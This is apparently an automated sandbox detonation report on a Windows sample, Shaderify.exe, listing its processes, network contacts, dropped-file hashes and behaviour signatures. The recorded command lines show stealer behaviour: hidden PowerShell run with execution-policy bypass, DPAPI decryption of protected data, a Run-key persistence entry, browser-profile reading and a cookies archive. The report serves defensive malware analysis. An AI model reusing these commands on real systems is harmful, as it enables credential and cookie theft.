powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,118,15,111,182,215,54,82,72,136,26,56,188,234,104,207,139,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,253,95,42,89,97,96,145,105,134,65,186,218,54,63,151,38,224,9,191,71,136,75,181,66,230,176,203,96,226,244,195,218,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,206,215,77,135,63,182,209,100,158,156,120,193,137,23,197,23,112,177,117,241,159,140,39,95,171,44,239,104,117,242,162,137,48,0,0,0,226,87,31,244,153,200,57,247,226,251,206,164,212,206,92,58,240,215,105,6,80,49,136,70,24,192,82,192,7,64,37,1,78,48,111,2,84,0,13,48,142,195,130,49,208,48,86,13,64,0,0,0,186,225,40,149,75,14,43,176,40,14,27,196,217,32,122,224,209,108,122,127,43,218,234,231,211,92,5,23,29,99,155,189,39,125,132,34,54,180,1,43,213,255,249,1,238,199,39,55,32,250,167,23,100,194,152,77,192,205,215,235,95,126,89,80), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,118,15,111,182,215,54,82,72,136,26,56,188,234,104,207,139,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,253,95,42,89,97,96,145,105,134,65,186,218,54,63,151,38,224,9,191,71,136,75,181,66,230,176,203,96,226,244,195,218,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,206,215,77,135,63,182,209,100,158,156,120,193,137,23,197,23,112,177,117,241,159,140,39,95,171,44,239,104,117,242,162,137,48,0,0,0,226,87,31,244,153,200,57,247,226,251,206,164,212,206,92,58,240,215,105,6,80,49,136,70,24,192,82,192,7,64,37,1,78,48,111,2,84,0,13,48,142,195,130,49,208,48,86,13,64,0,0,0,186,225,40,149,75,14,43,176,40,14,27,196,217,32,122,224,209,108,122,127,43,218,234,231,211,92,5,23,29,99,155,189,39,125,132,34,54,180,1,43,213,255,249,1,238,199,39,55,32,250,167,23,100,194,152,77,192,205,215,235,95,126,89,80), $null, 'CurrentUser')
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rcuzdlcd.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2A8B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2A8A.tmp"
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe" --type=gpu-process --field-trial-handle=1264,9975625559959901407,15312014027889785410,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1268 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1264,9975625559959901407,15312014027889785410,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1576 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe" --type=gpu-process --field-trial-handle=1264,9975625559959901407,15312014027889785410,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1372 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | shaderify.xyz | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
Files
\Users\Admin\AppData\Local\Temp\nsi17D5.tmp\System.dll
| MD5 | 75ed96254fbf894e42058062b4b4f0d1 |
| SHA1 | 996503f1383b49021eb3427bc28d13b5bbd11977 |
| SHA256 | a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7 |
| SHA512 | 58174896db81d481947b8745dafe3a02c150f3938bb4543256e8cce1145154e016d481df9fe68dac6d48407c62cbe20753320ebd5fe5e84806d07ce78e0eb0c4 |
\Users\Admin\AppData\Local\Temp\nsi17D5.tmp\nsis7z.dll
| MD5 | c6a070b3e68b292bb0efc9b26e85e9cc |
| SHA1 | 5a922b96eda6595a68fd0a9051236162ff2e2ada |
| SHA256 | 66ac8bd1f273a73e17a3f31d6add739d3cb0330a6417faeda11a9cae00b62d8b |
| SHA512 | 8eff8fc16f5bb574bd9483e3b217b67a8986e31497368c06fdaa3a1e93a40aee94a5b31729d01905157b0ae1e556a402f43cd29a4d30a0587e1ec334458a44e8 |
\Users\Admin\AppData\Local\Temp\nsi17D5.tmp\StdUtils.dll
| MD5 | 33b4e69e7835e18b9437623367dd1787 |
| SHA1 | 53afa03edaf931abdc2d828e5a2c89ad573d926c |
| SHA256 | 72d38ef115e71fc73dc5978987c583fc8c6b50ff12e4a5d30649a4d164a8b6ae |
| SHA512 | ca890e785d1a0a7e0b4a748416fba417826ae66b46e600f407d4e795b444612a8b830f579f2cf5b6e051bea800604f34f8801cc3daf05c8d29ad05bcda454a77 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\ffmpeg.dll
| MD5 | eabfc10d56cb44a86493cb2f8ca7aab2 |
| SHA1 | 09d7e87f43527333cd021329d6c2f4e8bd8ddab5 |
| SHA256 | 42a2a996ac433ac33a22776b8418a82753557093d90147b7951138b5c83924b6 |
| SHA512 | ee31e3539fba9e5969a9f38c428f586de2dd7630cb5d8c5e3c2c934b5881f8176b8ab6ef6397c1ce4fa6ccf3ee9615225c7afa0e0b28c6fc23974e8b96625dec |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\icudtl.dat
| MD5 | ad2988770b8cb3281a28783ad833a201 |
| SHA1 | 94b7586ee187d9b58405485f4c551b55615f11b5 |
| SHA256 | df876c7af43ed93eec6aea4d2d55c805009c219653cdeb368f1d048f4922b108 |
| SHA512 | f27e542a9c6c60fa28c5b7cc2818079341ef93aef3bbcadecad2dc11aff5b1592b19c7ebfa543ea42a3cbfec26a668641b255545fb0912056e25e852c2dedd01 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\v8_context_snapshot.bin
| MD5 | c2208c06c8ff81bca3c092cc42b8df1b |
| SHA1 | f7b9faa9ba0e72d062f68642a02cc8f3fed49910 |
| SHA256 | 4a67de195878d290f49b503b83e415917b8bbcbd9936b07a5d33b48e9bc6e0a3 |
| SHA512 | 6c3c370dd086a976c44d4059a315bd3bcbb50961aa34734e65a40d861cffca9090d47cec74575afe23952e394e4845bda2d8798eebe01fb54a7a6288bce238f5 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\resources\app.asar
| MD5 | e95d6f8d09a92e654aadf7a4117550cf |
| SHA1 | 8d1b84e9f8fae63fe5b598bdb767d1c062bf8ffe |
| SHA256 | 781877bb7bbe002e7dacbadc65241df8ae5842b8db297f61c8786fb8e7bab09b |
| SHA512 | 517c6e2a76a52880a08c18a0ea6201fdff385ed7485b462711eacf21dc32bf446539dc297c2517e9b049e0d9c3c5e1ea99ead5804ff3d90c728cf293e5589d2f |
\Users\Admin\AppData\Local\Temp\7dd312be-8b81-4e19-80ee-bd9316898c45.tmp.node
| MD5 | 56192831a7f808874207ba593f464415 |
| SHA1 | e0c18c72a62692d856da1f8988b0bc9c8088d2aa |
| SHA256 | 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c |
| SHA512 | c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33 |
memory/2176-181-0x000000001B800000-0x000000001BAE2000-memory.dmp
memory/2176-185-0x0000000001E80000-0x0000000001E88000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 63a28352b6c36497ca4c4cc6d3108042 |
| SHA1 | 533669455a744679cedfa7f9f8317638caa84056 |
| SHA256 | d9fcfd21dc2622e8e96585d0adc8c2ab5bd3e3d9ef0595959e9ee5ca93b5b779 |
| SHA512 | 3fa8ce3d1e47d9572d94e8b81074de6a9ebc693ca95a79919fce031fd94211d35cdd19ed1afe8bd06dd0b93f0c238cba599747f517cfcd488dac979ab346baf0 |
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | 52cc110bb3777aa6bba7900630d4eb49 |
| SHA1 | 3663dc658fd13d407e49781d1a5c2aa203c252fc |
| SHA256 | 892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6 |
| SHA512 | 89b80d2783e902d68ffd08b6f3fb1848ae6e6c4bf2d7a1e4afdac970b2ee6ffcc58116cdd6234e3d6278eb9413d36aafe62b5beca24a0846575d12af0c5112ab |
\??\c:\Users\Admin\AppData\Local\Temp\rcuzdlcd.cmdline
| MD5 | adda0367131b4a9e75f520fec38f064c |
| SHA1 | 6e6e5408909c4f8ef216e656a37f3a25b95a05e4 |
| SHA256 | 108f6addba15bd4e5ad2ccc8afa511045d9ad0247cf578c129e7f68767438632 |
| SHA512 | 987e2414fd42b89cf14d9f2b2e042d8b62aa50df117a17a4708c07233f0c6a5edad5bb6be8db59379bcd74418b368d54523983feec1f88d125b154041e112175 |
\??\c:\Users\Admin\AppData\Local\Temp\rcuzdlcd.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC2A8A.tmp
| MD5 | bf6d2072737b4a9ce0822d18ce7e228a |
| SHA1 | 5bcf8d841bb98134d9e577c1ed31c8b3c488c530 |
| SHA256 | 0531867d0663df2546b743b028ee2177cab86f6b2bd2c28c59cfb8e470cc2ccf |
| SHA512 | 273cc3692b909f18cf15b407f1bc97873f14d0d42623fddb74a29b2cf6be6a555ee9bc5dd3698a76f2dcdb86b74aaffcf3533671d325829328f704e739f0c44d |
C:\Users\Admin\AppData\Local\Temp\RES2A8B.tmp
| MD5 | 391d1b406fe684d335063ab084195d7e |
| SHA1 | a7e0a7aa89ea415db4659e94f6bb57c2f5188014 |
| SHA256 | 4cbedf4891c138f2c21c94fcc609d1dc11598924958a9d34ae78d3fd9a46cfb1 |
| SHA512 | 54f38e201faa9e6a910efb2aeff3db0ee4a450f45e3a96aa7c8bdd146a83e69991a80613eaf5ebec36b8c6a4a6d6dad3519f025f2d73277ad2751e82c11082a3 |
C:\Users\Admin\AppData\Local\Temp\rcuzdlcd.dll
| MD5 | f96ef939189ec53e847b38567f337448 |
| SHA1 | c787daa310ee53c414d614086335887f1c2aaf0d |
| SHA256 | a9f694cf9ef935ac4d882ab3284a5c71c6729accc1eafa1fef94d0c24a45620b |
| SHA512 | 29d97b84cf1a75afb67ecbde18fe49e812820d5c4b4531ddd555f17fdd82e944da6f0b9ec4b39ff2e21de9dff8de7cc828fadc10cc5a1a5d1b158cc2f6b73693 |
C:\Users\Admin\AppData\Local\Temp\rcuzdlcd.pdb
| MD5 | 158eccf81bd14803584a8bd511a6610c |
| SHA1 | 54726e4a3a2da38682484c93990829549f59e3af |
| SHA256 | ed429ac3f5609da53de8a27f75088ff9847fff8eecf99aaeda7e22d339fbd0b3 |
| SHA512 | ca2414060ca2db1f23cc01eb0377d826043e0c1531ed496805c2fc5cda005f657be6af6d44c357a13d79f9bdcb6d3a324d0a0c135837aff720042bdb412ab6d6 |
memory/2176-209-0x0000000002A80000-0x0000000002A88000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\chrome_100_percent.pak
| MD5 | 06baf0ad34e0231bd76651203dba8326 |
| SHA1 | a5f99ecdcc06dec9d7f9ce0a8c66e46969117391 |
| SHA256 | 5ae14147992a92548bcad76867dd88cdfcdb69d951c8720920cce6fb135e3189 |
| SHA512 | aff6616e56781ebb925a0ca146245ad3b2827250b32261c0c7c0d5b10b20a343a17fc3761c95d93104163e77b2eae3f1f9cbd3cb2b377f49b42bea39bdd09b91 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\resources.pak
| MD5 | d13873f6fb051266deb3599b14535806 |
| SHA1 | 143782c0ce5a5773ae0aae7a22377c8a6d18a5b2 |
| SHA256 | 7b953443e3cd54a0a4775528b52fbfe5ebecbc2c71731600ed0999d227969506 |
| SHA512 | 1ab38fcb70d1958c74da2493459532b52a04b884009509a1ac8dd39f6e9e670658a52f4d19ef57f1bc71dccfdd6ceedbc18034bbcad0b500d75a97c74aac6939 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\locales\en-US.pak
| MD5 | bd8f7b719110342b7cefb16ddd05ec55 |
| SHA1 | 82a79aeaa1dd4b1464b67053ba1766a4498c13e7 |
| SHA256 | d1d3f892be16329c79f9a8ee8c5fa1c9fb46d17edfeb56a3d9407f9d7587a0de |
| SHA512 | 7cd1493e59e87c70927e66769eb200f79a57e1eb1223af4eb4064088571893d3e32cbc4b5ece568fd308992aad65684aa280dc9834f2b5d327bdee514b046e5e |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\chrome_200_percent.pak
| MD5 | 57c27201e7cd33471da7ec205fe9973c |
| SHA1 | a8e7bce09c4cbdae2797611b2be8aeb5491036f9 |
| SHA256 | dd8146b2ee289e4d54a4a0f1fd3b2f61b979c6a2baaba96a406d96c3f4fdb33b |
| SHA512 | 57258aa169bec66abf0f45a3e026bb68751fb970b74bd0cb465607fa3b2a89967e832d92d8f675f0449bb6662fcb7786d05f0597124cc8e18bb99a47245779b4 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Admincookies.zip
| MD5 | 76cdb2bad9582d23c1f6f4d868218d6c |
| SHA1 | b04f3ee8f5e43fa3b162981b50bb72fe1acabb33 |
| SHA256 | 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85 |
| SHA512 | 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f |
memory/896-235-0x0000000000860000-0x0000000000861000-memory.dmp
memory/896-268-0x0000000077650000-0x0000000077651000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\D3DCompiler_47.dll
| MD5 | 7641e39b7da4077084d2afe7c31032e0 |
| SHA1 | 2256644f69435ff2fee76deb04d918083960d1eb |
| SHA256 | 44422e6936dc72b7ac5ed16bb8bcae164b7554513e52efb66a3e942cec328a47 |
| SHA512 | 8010e1cb17fa18bbf72d8344e1d63ded7cef7be6e7c13434fa6d8e22ce1d58a4d426959bdcb031502d4b145e29cb111af929fcbc66001111fbc6d7a19e8800a5 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\libglesv2.dll
| MD5 | bc45db0195aa369cc3c572e4e9eefc7e |
| SHA1 | b880ca4933656be52f027028af5ef8a3b7e07e97 |
| SHA256 | a81729fd6ee2d64dfc47501a1d53794cdeee5c1daa3751f7554aea2503686d10 |
| SHA512 | dd8c39947e7d767fbdccf90c5b3eaedf3937b43c55200d2199107333b63ac09e5356c286618874fac841e1357dd927e0c70b5066c1feeedd8cc6c0fba605ee5f |
\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\libEGL.dll
| MD5 | 660a9ae1282e6205fc0a51e64470eb5b |
| SHA1 | f91a9c9559f51a8f33a552f0145ed9e706909de8 |
| SHA256 | f2a841b6ef320f226965c7cb01fbc4709fc31425e490a3edfa20147ce3656c85 |
| SHA512 | 20bed2bed042033e3d8b077f9d66bce67922aaec180cc3777f20560219226b7efc73932bb87445afda4e3877472ddcd307215d23954cd082051437e5f2224263 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\swiftshader\libglesv2.dll
| MD5 | 8090f82a02c6850cc7bd2b481a7533e0 |
| SHA1 | 54a0b66d76c1b60e45e83ba4627299d0b2aae84a |
| SHA256 | e9473ba82f6d8742ab74e67484886291aa69037db72e0ae256b19581de0b772e |
| SHA512 | b2e3c57926860a7954ca6e426f5f2fa080cf6ccb5c4edd77f59744f240f597aa9613f46294e8b344db76b46fe78777b5016828b8ab2fc274ca107f3af7abd878 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\swiftshader\libegl.dll
| MD5 | acd46d81bb4f34912c255a8d01953635 |
| SHA1 | 25969cc9e588e174b854566778f283f067c3c0c6 |
| SHA256 | bd1bc00a5c29726fb39645041fc6c8295256d90c7f739ebeaa8b6c382a4db189 |
| SHA512 | 83692654ada422391b428953b2cec67048a171bbef4c59158f34607a762feac8a233b52ceaa528306cf103d9830ee38897afa996389e086d3778f290555a059b |
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240426-en
Max time kernel
92s
Max time network
154s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1608 wrote to memory of 816 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 816 -ip 816
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 612
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240508-en
Max time kernel
145s
Max time network
151s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe
"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"
Network
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240221-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2908 wrote to memory of 2368 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2908 -s 80
Network
Files
Analysis: behavioral31
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:50
Platform
win10v2004-20240508-en
Max time kernel
131s
Max time network
101s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3240 wrote to memory of 1912 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1912 -ip 1912
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1912 -s 624
Network
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240221-en
Max time kernel
150s
Max time network
124s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\vfwXHbuGrmUZdWK.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,200,52,246,139,142,208,68,160,175,218,80,251,197,138,112,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,218,162,196,100,79,46,247,43,217,118,222,116,251,4,213,64,178,43,144,201,143,84,6,167,161,16,184,2,218,100,6,37,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,89,159,103,187,12,163,9,4,119,168,98,242,147,43,71,19,135,20,13,210,153,26,145,154,126,126,225,90,152,72,193,48,0,0,0,62,121,66,123,38,21,143,132,144,20,232,210,124,88,47,113,66,244,120,173,86,199,149,89,12,113,16,137,6,76,252,198,210,167,186,20,136,163,153,105,122,69,104,179,88,170,105,11,64,0,0,0,107,147,246,161,81,84,201,129,253,138,140,188,66,116,33,146,239,68,29,223,253,252,255,164,100,122,38,103,192,186,98,247,212,97,214,254,62,192,238,229,238,249,192,211,109,103,83,61,3,234,41,120,50,228,215,189,93,49,251,72,228,234,237,149), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,200,52,246,139,142,208,68,160,175,218,80,251,197,138,112,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,218,162,196,100,79,46,247,43,217,118,222,116,251,4,213,64,178,43,144,201,143,84,6,167,161,16,184,2,218,100,6,37,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,89,159,103,187,12,163,9,4,119,168,98,242,147,43,71,19,135,20,13,210,153,26,145,154,126,126,225,90,152,72,193,48,0,0,0,62,121,66,123,38,21,143,132,144,20,232,210,124,88,47,113,66,244,120,173,86,199,149,89,12,113,16,137,6,76,252,198,210,167,186,20,136,163,153,105,122,69,104,179,88,170,105,11,64,0,0,0,107,147,246,161,81,84,201,129,253,138,140,188,66,116,33,146,239,68,29,223,253,252,255,164,100,122,38,103,192,186,98,247,212,97,214,254,62,192,238,229,238,249,192,211,109,103,83,61,3,234,41,120,50,228,215,189,93,49,251,72,228,234,237,149), $null, 'CurrentUser')
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yiuunn7z.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES148B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC148A.tmp"
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
